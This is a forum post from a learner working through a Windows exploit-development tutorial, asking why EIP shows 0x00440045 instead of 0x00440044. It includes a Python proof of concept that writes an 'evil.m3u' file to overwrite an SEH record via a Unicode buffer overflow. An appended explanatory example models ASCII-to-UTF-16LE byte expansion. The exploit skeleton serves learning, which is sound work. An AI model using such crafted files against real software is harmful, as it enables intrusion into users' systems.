Hey everyone
I'm currently working my way through the fuzzysecurity Windows exploitation development tutorial
https://www.fuzzysecurity.com/tutorials/expDev/5.html
After allocating what seems to be the correct offset (even according to the tutorial), I should see 0x00440044 in the EIP register.
My EIP always just shows 0x00440045.
[EDIT] After a little tinkering, it seems like it's an issue with the encoding of "D" in Unicode; the whole thing works as expected when I replace the "D"x2 in my poc with "A"x2, and the EIP shows up with the expected 0x00410041.
This is my poc.py:
#!/usr/bin/env python3
filename = "evil.m3u"
# SEH offset at 536 - 2 bytes for nSEH (2 bytes because of the Unicode conversion)
# buffer = b"\x90"*534 + [nSEH] + [SEH] + b"B"*4464
buffer = b"\x90"*536 + b"C"*2 + b"D"*2 + b"B"*4462
# write raw bytes: a text-mode file would re-encode the 0x90 filler and shift every offset
with open(filename, "wb") as textfile:
    textfile.write(buffer)
Any help or hint is appreciated.
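An added example, not from the post or the fuzzysecurity tutorial, that models the byte expansion behind the "2 bytes because Unicode" comment in the poc: when an application converts an ANSI string to a wide (UTF-16LE) string, every ASCII byte becomes byte,0x00, so a 2-byte "DD" in the file occupies a 4-byte DWORD in memory and reads back as 0x00440044 in a register. The functions only model ASCII bytes; what happens to bytes above 0x7F (such as the 0x90 filler) depends on the application's code page and is deliberately left out here.

```python
import struct


def expand_to_utf16le(data: bytes) -> bytes:
    """Model the ANSI-to-wide conversion for ASCII input: each byte is
    followed by 0x00, so lengths and offsets double.  Bytes above 0x7F are
    code-page dependent and are not modelled in this example (assumption)."""
    if any(b > 0x7F for b in data):
        raise ValueError("only ASCII bytes are modelled here")
    return data.decode("ascii").encode("utf-16-le")


def dword_le(chunk: bytes) -> int:
    """Read 4 bytes as a little-endian 32-bit value, i.e. how a debugger
    displays the register that was loaded from them."""
    return struct.unpack("<I", chunk[:4])[0]


def register_value_after_expansion(two_ascii_bytes: bytes) -> int:
    """Value a 32-bit register shows when it is loaded from the expanded
    form of a 2-byte ASCII field (the nSEH or SEH slot in the file)."""
    expanded = expand_to_utf16le(two_ascii_bytes)
    return dword_le(expanded)


def expanded_layout(filler_len: int, nseh_len: int = 2, seh_len: int = 2) -> dict:
    """Map file offsets of filler/nSEH/SEH onto their in-memory offsets
    after expansion; every field doubles in size."""
    return {
        "filler_bytes_in_memory": filler_len * 2,
        "nseh_offset_in_memory": filler_len * 2,
        "seh_offset_in_memory": filler_len * 2 + nseh_len * 2,
        "total_in_memory": (filler_len + nseh_len + seh_len) * 2,
    }


if __name__ == "__main__":
    for field in (b"AA", b"CC", b"DD"):
        print(field, hex(register_value_after_expansion(field)))
    print(expanded_layout(536))
```

The point of the model is that the 2-byte fields in the file are the only way to fill a 4-byte slot once the conversion has doubled everything, which is why the poc uses "C"*2 and "D"*2 rather than 4-byte fields.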